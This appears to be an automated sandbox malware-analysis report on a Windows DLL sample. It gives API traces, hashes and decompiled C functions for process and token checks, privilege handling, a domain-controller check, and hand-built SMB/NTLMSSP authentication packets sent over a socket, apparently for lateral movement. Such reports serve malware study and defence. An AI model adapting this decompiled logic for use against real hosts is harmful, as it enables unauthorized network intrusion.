                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A4853E
                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 04A48556
                                                                                                            • Part of subcall function 04A4841D: GetCurrentProcessId.KERNEL32(?,04A48555,?,?), ref: 04A48430
                                                                                                            • Part of subcall function 04A4841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04A48555,?,?), ref: 04A4844C
                                                                                                            • Part of subcall function 04A4841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04A48555,?,?), ref: 04A48464
                                                                                                            • Part of subcall function 04A4841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04A48555,?,?), ref: 04A4847D
                                                                                                            • Part of subcall function 04A4841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04A484A3
                                                                                                            • Part of subcall function 04A4841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 04A484BA
                                                                                                            • Part of subcall function 04A4841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 04A484CB
                                                                                                            • Part of subcall function 04A4841D: FreeSid.ADVAPI32(?), ref: 04A484D4
                                                                                                            • Part of subcall function 04A4841D: CloseHandle.KERNEL32(?), ref: 04A484DD
                                                                                                            • Part of subcall function 04A4841D: CloseHandle.KERNEL32(?,?,?,?,04A48555,?,?), ref: 04A484E2
                                                                                                            • Part of subcall function 04A4841D: CloseHandle.KERNEL32(00000000,?,?,?,04A48555,?,?), ref: 04A484E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 3524103904-0
                                                                                                          • Opcode ID: 14c23785a59f3a18324bd1c1dd0a0bc017a39db8c81d2a8ef509f71e1d1eba45
                                                                                                          • Instruction ID: 23ad0969fa6a5fefc0c8d86ccbd2933ca87ecf5b741138d99301f62d809c0696
                                                                                                          • Opcode Fuzzy Hash: 14c23785a59f3a18324bd1c1dd0a0bc017a39db8c81d2a8ef509f71e1d1eba45
                                                                                                          • Instruction Fuzzy Hash: C6F09039502124ABDB207BB8BC0DFEE7ABCDFCD714F100195E915E2090E739AE458E96
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 68%
                                                                                                          			E04A4554A(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                          				signed int _v8;
                                                                                                          				long** _t8;
                                                                                                          				void* _t14;
                                                                                                          				int _t15;
                                                                                                          
                                                                                                          				_t15 = 0;
                                                                                                          				_v8 = _v8 & 0;
                                                                                                          				_t8 =  &_v8;
                                                                                                          				__imp__CryptAcquireContextW(_t8, 0, 0, 0x18, 0xf0000000, _t14, __ecx); // executed
                                                                                                          				if(_t8 != 0 || GetLastError() == 0x80090016) {
                                                                                                          					_t15 = CryptGenRandom(_v8, _a8, _a4);
                                                                                                          					CryptReleaseContext(_v8, 0);
                                                                                                          				}
                                                                                                          				return _t15;
                                                                                                          			}







                                                                                                          0x04a45556
                                                                                                          0x04a45558
                                                                                                          0x04a4555d
                                                                                                          0x04a45561
                                                                                                          0x04a45569
                                                                                                          0x04a4558c
                                                                                                          0x04a4558e
                                                                                                          0x04a4558e
                                                                                                          0x04a45598

                                                                                                          APIs
                                                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04A45561
                                                                                                          • GetLastError.KERNEL32(?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A4556B
                                                                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A45581
                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A4558E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 2963463078-0
                                                                                                          • Opcode ID: d655aecebfe842d0b0af431dfb7451fe7d7324faffa65de72cc1c3ec2a67084b
                                                                                                          • Instruction ID: 0ccae84c48ee80d96f4e12a29f5c2e656e4b22e4d55e77a469315395aba3a9ed
                                                                                                          • Opcode Fuzzy Hash: d655aecebfe842d0b0af431dfb7451fe7d7324faffa65de72cc1c3ec2a67084b
                                                                                                          • Instruction Fuzzy Hash: 10F0373A900208FBDF105FA5ED09F9E7A7AEBD8751F204014F605D7110D635DE06E710
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 16%
                                                                                                          			E04A45507(intOrPtr _a4) {
                                                                                                          				void* _t3;
                                                                                                          				void* _t7;
                                                                                                          				intOrPtr* _t8;
                                                                                                          
                                                                                                          				_t8 = __imp__CryptAcquireContextW;
                                                                                                          				_t3 =  *_t8(_a4, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                          				_t7 = _t3;
                                                                                                          				if(_t7 == 0 && GetLastError() == 0x80090016) {
                                                                                                          					_t7 =  *_t8(_a4, _t7, _t7, 0x18, 8);
                                                                                                          				}
                                                                                                          				return _t7;
                                                                                                          			}






                                                                                                          0x04a4550c
                                                                                                          0x04a45520
                                                                                                          0x04a45522
                                                                                                          0x04a45526
                                                                                                          0x04a45540
                                                                                                          0x04a45540
                                                                                                          0x04a45547

                                                                                                          APIs
                                                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04A462C3,?), ref: 04A45520
                                                                                                          • GetLastError.KERNEL32(?,04A462C3,?), ref: 04A45528
                                                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04A462C3,?), ref: 04A4553E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AcquireContextCrypt$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2779411412-0
                                                                                                          • Opcode ID: e4a0ea750912739e1c1e74417044014e6ab9c631d833e5f02a3cec6471179ec6
                                                                                                          • Instruction ID: 3ad026c8d77b2362a7f06017fb805a1fc125b8a461c185037c7111bf12c14c76
                                                                                                          • Opcode Fuzzy Hash: e4a0ea750912739e1c1e74417044014e6ab9c631d833e5f02a3cec6471179ec6
                                                                                                          • Instruction Fuzzy Hash: 48E04F717C461D7BFB201A98AC81F6E3A9DDBAC754F208026F700AA191CAE1AD0557A4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 37%
                                                                                                          			E04A47D4E(void* __ecx) {
                                                                                                          				signed int _v8;
                                                                                                          				void** _t9;
                                                                                                          				signed char _t12;
                                                                                                          				void* _t14;
                                                                                                          				void* _t15;
                                                                                                          				void* _t16;
                                                                                                          
                                                                                                          				_t9 =  &_v8;
                                                                                                          				_t16 = 0;
                                                                                                          				_v8 = _v8 & 0;
                                                                                                          				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
                                                                                                          				_t14 = _v8;
                                                                                                          				if(_t9 == 0) {
                                                                                                          					_t12 =  *(_t14 + 0x10);
                                                                                                          					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
                                                                                                          						_t16 = 1;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				if(_t14 != 0) {
                                                                                                          					NetApiBufferFree(_t14);
                                                                                                          				}
                                                                                                          				return _t16;
                                                                                                          			}









                                                                                                          0x04a47d53
                                                                                                          0x04a47d57
                                                                                                          0x04a47d59
                                                                                                          0x04a47d5f
                                                                                                          0x04a47d65
                                                                                                          0x04a47d6a
                                                                                                          0x04a47d6c
                                                                                                          0x04a47d74
                                                                                                          0x04a47d7c
                                                                                                          0x04a47d7c
                                                                                                          0x04a47d74
                                                                                                          0x04a47d7f
                                                                                                          0x04a47d82
                                                                                                          0x04a47d82
                                                                                                          0x04a47d8c

                                                                                                          APIs
                                                                                                          • NetServerGetInfo.NETAPI32(00000000,00000065,?,7439C4E0,?,?,04A48C7C), ref: 04A47D5F
                                                                                                          • NetApiBufferFree.NETAPI32(?,?,?,04A48C7C), ref: 04A47D82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BufferFreeInfoServer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3855943681-0
                                                                                                          • Opcode ID: f117a7868e189e30dda10b86eb895ccae3298812a463b195e4c47dcaac8ea011
                                                                                                          • Instruction ID: 684e440118781cd50b10974272770d779530cab937b78b55cb2bc53044c28c44
                                                                                                          • Opcode Fuzzy Hash: f117a7868e189e30dda10b86eb895ccae3298812a463b195e4c47dcaac8ea011
                                                                                                          • Instruction Fuzzy Hash: C7E09279711624A7EB24CB55CD08BBE766CDFC0A91B00011AEC42E6100E321EE028AD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4a41747-4a41757 1 4a4175a-4a41763 0->1 1->1 2 4a41765-4a41795 GetProcessHeap HeapAlloc 1->2 3 4a41c30-4a41c37 2->3 4 4a4179b-4a417a0 2->4 5 4a417a2-4a417af 4->5 5->5 6 4a417b1-4a417bb CharUpperW 5->6 7 4a417be-4a417c7 6->7 7->7 8 4a417c9-4a417e6 GetProcessHeap HeapAlloc 7->8 9 4a41c22-4a41c29 GetProcessHeap 8->9 10 4a417ec-4a4184b htons 8->10 9->3 11 4a4184e-4a41857 10->11 11->11 12 4a41859-4a4186b send 11->12 13 4a41c16-4a41c1b GetProcessHeap 12->13 14 4a41871-4a4188a recv 12->14 13->9 14->13 15 4a41890-4a418a5 14->15 15->13 16 4a418ab-4a418ad 15->16 17 4a418ae-4a418c1 16->17 18 4a418c3-4a418c5 17->18 19 4a418ce-4a418d2 17->19 18->19 20 4a418c7-4a418cc 18->20 19->17 21 4a418d4 19->21 20->19 22 4a418d9-4a41904 GetProcessHeap HeapAlloc 20->22 21->13 22->13 23 4a4190a-4a41926 call 4a415a7 22->23 26 4a4192c-4a41948 call 4a415a7 23->26 27 4a41c08-4a41c0f GetProcessHeap 23->27 26->27 30 4a4194e-4a41962 GetProcessHeap HeapAlloc 26->30 27->13 31 4a41968-4a4197c 30->31 32 4a41bfa-4a41c01 GetProcessHeap 30->32 33 4a41983-4a41994 rand 31->33 32->27 33->33 34 4a41996-4a419ae call 4a415a7 33->34 37 4a419b4-4a419c2 GetProcessHeap HeapAlloc 34->37 38 4a41bec-4a41bf3 GetProcessHeap 34->38 39 4a41bde-4a41be5 GetProcessHeap 37->39 40 4a419c8-4a419e5 37->40 38->32 39->38 41 4a419f4-4a41a08 40->41 42 4a419e7-4a419ed 40->42 43 4a41a0e-4a41a20 GetProcessHeap HeapAlloc 41->43 44 4a41a0a 41->44 42->41 45 4a41a26-4a41a74 htons 43->45 46 4a41bc3-4a41bdb 43->46 44->43 47 4a41a76-4a41a79 45->47 48 4a41a7d-4a41ad1 45->48 46->39 47->48 49 4a41ad3-4a41b0c 48->49 50 4a41b0e-4a41b2d 48->50 52 4a41b31-4a41b55 memcpy 49->52 50->52 54 4a41b66-4a41b6f 52->54 55 4a41b57-4a41b64 52->55 56 4a41b71-4a41b82 send 54->56 55->56 57 4a41b84-4a41b9b recv 56->57 58 4a41bb3-4a41bbc 56->58 57->58 59 4a41b9d-4a41ba1 57->59 58->46 61 4a41ba7-4a41bb0 memset 59->61 62 4a41ba3 59->62 61->58 62->61
                                                                                                          C-Code - Quality: 80%
                                                                                                          			E04A41747(intOrPtr _a4, void** _a8, long _a12, void* _a16, signed int _a20, void* _a24) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				int _v16;
                                                                                                          				void* _v20;
                                                                                                          				void* _v24;
                                                                                                          				void* _v28;
                                                                                                          				void* _v32;
                                                                                                          				void* _v36;
                                                                                                          				void* _v40;
                                                                                                          				void _v44;
                                                                                                          				void* _v48;
                                                                                                          				intOrPtr* _t165;
                                                                                                          				signed short _t168;
                                                                                                          				int _t170;
                                                                                                          				signed short* _t175;
                                                                                                          				intOrPtr* _t177;
                                                                                                          				void* _t187;
                                                                                                          				short _t189;
                                                                                                          				short _t193;
                                                                                                          				signed char* _t194;
                                                                                                          				void* _t198;
                                                                                                          				void* _t201;
                                                                                                          				signed int _t205;
                                                                                                          				void* _t209;
                                                                                                          				void* _t212;
                                                                                                          				long _t215;
                                                                                                          				int _t216;
                                                                                                          				void* _t218;
                                                                                                          				void* _t222;
                                                                                                          				void* _t235;
                                                                                                          				short _t237;
                                                                                                          				short _t240;
                                                                                                          				char _t244;
                                                                                                          				char _t245;
                                                                                                          				char _t246;
                                                                                                          				short _t250;
                                                                                                          				void* _t253;
                                                                                                          				void* _t257;
                                                                                                          				short _t258;
                                                                                                          				intOrPtr _t261;
                                                                                                          				void* _t264;
                                                                                                          				void* _t266;
                                                                                                          				signed int _t267;
                                                                                                          				void* _t268;
                                                                                                          				signed int _t269;
                                                                                                          				void* _t271;
                                                                                                          				intOrPtr* _t282;
                                                                                                          				signed int _t285;
                                                                                                          				intOrPtr _t288;
                                                                                                          				signed int _t289;
                                                                                                          				short _t292;
                                                                                                          				intOrPtr _t293;
                                                                                                          				WCHAR* _t294;
                                                                                                          				intOrPtr _t295;
                                                                                                          				signed char _t297;
                                                                                                          				signed int _t300;
                                                                                                          				intOrPtr _t302;
                                                                                                          				void* _t304;
                                                                                                          				void* _t305;
                                                                                                          				signed int* _t308;
                                                                                                          				void* _t309;
                                                                                                          				void* _t315;
                                                                                                          				void* _t319;
                                                                                                          				void* _t321;
                                                                                                          				void* _t322;
                                                                                                          				signed short _t325;
                                                                                                          				void* _t328;
                                                                                                          				void* _t329;
                                                                                                          				void* _t330;
                                                                                                          				void* _t331;
                                                                                                          
                                                                                                          				_t165 = _a16;
                                                                                                          				_v5 = 0;
                                                                                                          				_t266 = _t165 + 2;
                                                                                                          				do {
                                                                                                          					_t293 =  *_t165;
                                                                                                          					_t165 = _t165 + 2;
                                                                                                          				} while (_t293 != 0);
                                                                                                          				_t168 = _t165 - _t266 >> 0x00000001 & 0x0000ffff;
                                                                                                          				_v12 = _t168;
                                                                                                          				_t170 = (_t168 & 0x0000ffff) + (_t168 & 0x0000ffff);
                                                                                                          				_v16 = _t170;
                                                                                                          				_t294 = HeapAlloc(GetProcessHeap(), 8, _t170 + 2);
                                                                                                          				_v36 = _t294;
                                                                                                          				if(_t294 == 0) {
                                                                                                          					L53:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t175 = _a16;
                                                                                                          				_t304 = _t294 - _t175;
                                                                                                          				do {
                                                                                                          					_t267 =  *_t175 & 0x0000ffff;
                                                                                                          					 *(_t304 + _t175) = _t267;
                                                                                                          					_t175 =  &(_t175[1]);
                                                                                                          				} while (_t267 != 0);
                                                                                                          				CharUpperW(_t294);
                                                                                                          				_t177 = _a20;
                                                                                                          				_t268 = _t177 + 2;
                                                                                                          				do {
                                                                                                          					_t295 =  *_t177;
                                                                                                          					_t177 = _t177 + 2;
                                                                                                          				} while (_t295 != 0);
                                                                                                          				_v32 = _t177 - _t268 >> 0x00000001 & 0x0000ffff;
                                                                                                          				_t305 = HeapAlloc(GetProcessHeap(), 8, 0x86);
                                                                                                          				_v28 = _t305;
                                                                                                          				if(_t305 == 0) {
                                                                                                          					L52:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v36);
                                                                                                          					goto L53;
                                                                                                          				}
                                                                                                          				_t321 =  *_a8;
                                                                                                          				_t269 = 9;
                                                                                                          				 *((short*)(_t321 + 0x20)) = 0;
                                                                                                          				_t187 = memcpy(_t305, _t321, _t269 << 2);
                                                                                                          				_t329 = _t328 + 0xc;
                                                                                                          				__imp__#9(0x82);
                                                                                                          				_t322 = _v28;
                                                                                                          				 *(_t322 + 2) = _t187;
                                                                                                          				 *((short*)(_t322 + 0x29)) = 0x1104;
                                                                                                          				_t189 = 2;
                                                                                                          				 *((short*)(_t322 + 0x2b)) = _t189;
                                                                                                          				_t271 = 0x42;
                                                                                                          				 *((short*)(_t322 + 0x2d)) = 1;
                                                                                                          				 *((short*)(_t322 + 0x33)) = 0;
                                                                                                          				_t193 = 0x47;
                                                                                                          				 *((short*)(_t322 + 0x3d)) = _t193;
                                                                                                          				 *((char*)(_t322 + 8)) = 0x73;
                                                                                                          				 *((short*)(_t322 + 0x24)) = 0xff0c;
                                                                                                          				 *((intOrPtr*)(_t322 + 0x39)) = 0x8000c044;
                                                                                                          				_t308 = 0x4a535f0;
                                                                                                          				_t194 = _t322 + 0x3f;
                                                                                                          				do {
                                                                                                          					_t297 =  !( *_t308);
                                                                                                          					_t308 =  &(_t308[0]);
                                                                                                          					 *_t194 = _t297;
                                                                                                          					_t194 =  &(_t194[1]);
                                                                                                          					_t271 = _t271 - 1;
                                                                                                          				} while (_t271 != 0);
                                                                                                          				__imp__#19(_a4, _t322, 0x86, _t271); // executed
                                                                                                          				if(_t194 <= 0) {
                                                                                                          					L51:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t322);
                                                                                                          					goto L52;
                                                                                                          				}
                                                                                                          				_t309 = _a24;
                                                                                                          				__imp__#16(_a4, _t309, 0xffff, 0); // executed
                                                                                                          				if(_t194 <= 0x84) {
                                                                                                          					goto L51;
                                                                                                          				}
                                                                                                          				 *((short*)( *_a8 + 0x20)) =  *((intOrPtr*)(_t309 + 0x20));
                                                                                                          				if( *((intOrPtr*)(_t309 + 9)) != 0xc0000016) {
                                                                                                          					goto L51;
                                                                                                          				}
                                                                                                          				_t198 = 0x2d;
                                                                                                          				while(1) {
                                                                                                          					_t300 =  *(_t198 + _t309 + 4) ^ 0x00505353;
                                                                                                          					if(( *(_t198 + _t309) ^ 0x4d4c544e) == 0 && _t300 == 0 &&  *((intOrPtr*)(_t198 + _t309 + 8)) == 2) {
                                                                                                          						break;
                                                                                                          					}
                                                                                                          					_t198 = _t198 + 1;
                                                                                                          					if(_t198 < 0x70) {
                                                                                                          						continue;
                                                                                                          					}
                                                                                                          					goto L51;
                                                                                                          				}
                                                                                                          				_v44 =  *((intOrPtr*)(_t198 + _t309 + 0x18));
                                                                                                          				_v40 =  *((intOrPtr*)(_t198 + _t309 + 0x1c));
                                                                                                          				 *_a12 =  *((intOrPtr*)(_t198 + _t309 + 0x30));
                                                                                                          				_t201 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                          				_v24 = _t201;
                                                                                                          				if(_t201 == 0) {
                                                                                                          					goto L51;
                                                                                                          				}
                                                                                                          				_t205 = E04A415A7(_a20, (_v32 & 0x0000ffff) + (_v32 & 0x0000ffff), 0,  &_v24, 0x8002); // executed
                                                                                                          				if(_t205 != 0) {
                                                                                                          					L50:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v24);
                                                                                                          					goto L51;
                                                                                                          				}
                                                                                                          				_a20 = _a20 & _t205;
                                                                                                          				_t209 = E04A415A7(_v36, _v16, _v24,  &_a20, 0x8003); // executed
                                                                                                          				if(_t209 != 0) {
                                                                                                          					goto L50;
                                                                                                          				}
                                                                                                          				_v48 = _a20;
                                                                                                          				_t212 = HeapAlloc(GetProcessHeap(), 8, 0x10);
                                                                                                          				_v32 = _t212;
                                                                                                          				if(_t212 == 0) {
                                                                                                          					L49:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                          					goto L50;
                                                                                                          				}
                                                                                                          				 *_t212 = _v44;
                                                                                                          				 *((intOrPtr*)(_t212 + 4)) = _v40;
                                                                                                          				_t215 = _t212 + 8;
                                                                                                          				_v40 = _t215;
                                                                                                          				_a12 = _t215;
                                                                                                          				_v20 = 8;
                                                                                                          				do {
                                                                                                          					_t216 = rand();
                                                                                                          					_a12 = _a12 + 1;
                                                                                                          					_t70 =  &_v20;
                                                                                                          					 *_t70 = _v20 - 1;
                                                                                                          					 *_a12 = _t216;
                                                                                                          				} while ( *_t70 != 0);
                                                                                                          				_t218 = E04A415A7(_v32, 0x10, _a20,  &_a20, 0x8003); // executed
                                                                                                          				if(_t218 == 0) {
                                                                                                          					_t222 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                          					_v20 = _t222;
                                                                                                          					if(_t222 != 0) {
                                                                                                          						_t282 = _v40;
                                                                                                          						asm("movsd");
                                                                                                          						asm("movsd");
                                                                                                          						asm("movsd");
                                                                                                          						asm("movsd");
                                                                                                          						 *((intOrPtr*)(_t222 + 0x10)) =  *_t282;
                                                                                                          						 *((intOrPtr*)(_t222 + 0x14)) =  *((intOrPtr*)(_t282 + 4));
                                                                                                          						if(0 == _v12) {
                                                                                                          							 *_t222 = 0x55004e;
                                                                                                          							 *((intOrPtr*)(_t222 + 4)) = 0x4c004c;
                                                                                                          						}
                                                                                                          						_a12 = (_v12 & 0x0000ffff) + (_v12 & 0x0000ffff) + 0xa4;
                                                                                                          						if(0 == _v12) {
                                                                                                          							_a12 = _a12 - 0x10;
                                                                                                          						}
                                                                                                          						_t264 = HeapAlloc(GetProcessHeap(), 8, _a12);
                                                                                                          						if(_t264 != 0) {
                                                                                                          							_t285 = 9;
                                                                                                          							_t235 = memcpy(_t264,  *_a8, _t285 << 2);
                                                                                                          							_t330 = _t329 + 0xc;
                                                                                                          							__imp__#9(_a12 + 0xfffffffc);
                                                                                                          							_t325 = _v12;
                                                                                                          							 *(_t264 + 2) = _t235;
                                                                                                          							 *((short*)(_t264 + 0x29)) = 0x1104;
                                                                                                          							_t237 = 2;
                                                                                                          							 *((short*)(_t264 + 0x2b)) = _t237;
                                                                                                          							 *((short*)(_t264 + 0x2d)) = 1;
                                                                                                          							_t240 = _t325 + _t325 + 0x60;
                                                                                                          							 *((char*)(_t264 + 8)) = 0x73;
                                                                                                          							 *((short*)(_t264 + 0x24)) = 0xff0c;
                                                                                                          							 *((short*)(_t264 + 0x33)) = _t240;
                                                                                                          							if(0 == _t325) {
                                                                                                          								 *((short*)(_t264 + 0x33)) = _t240 + 0xfffffff0;
                                                                                                          							}
                                                                                                          							 *((short*)(_t264 + 0x3d)) =  *((intOrPtr*)(_t264 + 0x33)) + 5;
                                                                                                          							_t244 =  *((intOrPtr*)(_t264 + 0x33)) - 2;
                                                                                                          							 *((char*)(_t264 + 0x40)) = _t244;
                                                                                                          							_t245 = _t244 - 2;
                                                                                                          							 *((char*)(_t264 + 0x42)) = _t245;
                                                                                                          							_t246 = _t245 - 2;
                                                                                                          							 *((char*)(_t264 + 0x44)) = _t246;
                                                                                                          							 *((char*)(_t264 + 0x46)) = _t246 - 2;
                                                                                                          							 *((intOrPtr*)(_t264 + 0x39)) = 0x8000c044;
                                                                                                          							 *((char*)(_t264 + 0x3f)) = 0xa1;
                                                                                                          							 *((char*)(_t264 + 0x41)) = 0x30;
                                                                                                          							 *((char*)(_t264 + 0x43)) = 0xa2;
                                                                                                          							 *((char*)(_t264 + 0x45)) = 4;
                                                                                                          							 *((intOrPtr*)(_t264 + 0x47)) = 0x4d4c544e;
                                                                                                          							 *((intOrPtr*)(_t264 + 0x4b)) = 0x505353;
                                                                                                          							 *((intOrPtr*)(_t264 + 0x4f)) = 3;
                                                                                                          							if(0 == _t325) {
                                                                                                          								_t288 = 0x48;
                                                                                                          								_push(0x40);
                                                                                                          								 *((intOrPtr*)(_t264 + 0x67)) = 0;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x6f)) = 0;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x77)) = 0;
                                                                                                          								_t250 = 8;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x57)) = _t288;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x5f)) = _t288;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x7f)) = _t288;
                                                                                                          								 *((short*)(_t264 + 0x73)) = _t250;
                                                                                                          								 *((short*)(_t264 + 0x75)) = _t250;
                                                                                                          							} else {
                                                                                                          								_t258 = 0x18;
                                                                                                          								 *((short*)(_t264 + 0x53)) = _t258;
                                                                                                          								 *((short*)(_t264 + 0x55)) = _t258;
                                                                                                          								_t302 = 0x68;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x57)) = (_t325 & 0x0000ffff) + (_t325 & 0x0000ffff) + 0x40;
                                                                                                          								_t261 = 0x40;
                                                                                                          								_t292 = _t325 + _t325;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x5f)) = _t302;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x67)) = _t261;
                                                                                                          								 *((short*)(_t264 + 0x6b)) = _t292;
                                                                                                          								 *((short*)(_t264 + 0x6d)) = _t292;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x6f)) = _t261;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x77)) = 0x50;
                                                                                                          								 *((intOrPtr*)(_t264 + 0x7f)) = _t302;
                                                                                                          							}
                                                                                                          							_t142 = _t264 + 0x87; // 0x87
                                                                                                          							_t315 = _t142;
                                                                                                          							 *((intOrPtr*)(_t264 + 0x83)) = 0xa0880205;
                                                                                                          							memcpy(_t315, _a16, _v16);
                                                                                                          							_t331 = _t330 + 0xc;
                                                                                                          							if(0 != _t325) {
                                                                                                          								_t289 = 6;
                                                                                                          								_t253 = memcpy(_t315 + _v16, _v20, _t289 << 2);
                                                                                                          								_t331 = _t331 + 0xc;
                                                                                                          							} else {
                                                                                                          								_t257 = _v20;
                                                                                                          								 *_t315 =  *_t257;
                                                                                                          								_t253 =  *(_t257 + 4);
                                                                                                          								 *(_t315 + 4) = _t253;
                                                                                                          							}
                                                                                                          							__imp__#19(_a4, _t264, _a12, 0); // executed
                                                                                                          							if(_t253 > 0) {
                                                                                                          								_t319 = _a24;
                                                                                                          								__imp__#16(_a4, _t319, 0xffff, 0); // executed
                                                                                                          								if(_t253 > 0) {
                                                                                                          									if( *((intOrPtr*)(_t319 + 9)) == 0) {
                                                                                                          										_v5 = 1;
                                                                                                          									}
                                                                                                          									memset(_t319, 0, 0xffff);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							HeapFree(GetProcessHeap(), 8, _t264);
                                                                                                          						}
                                                                                                          						HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                          						_t322 = _v28;
                                                                                                          					}
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v48);
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _v32);
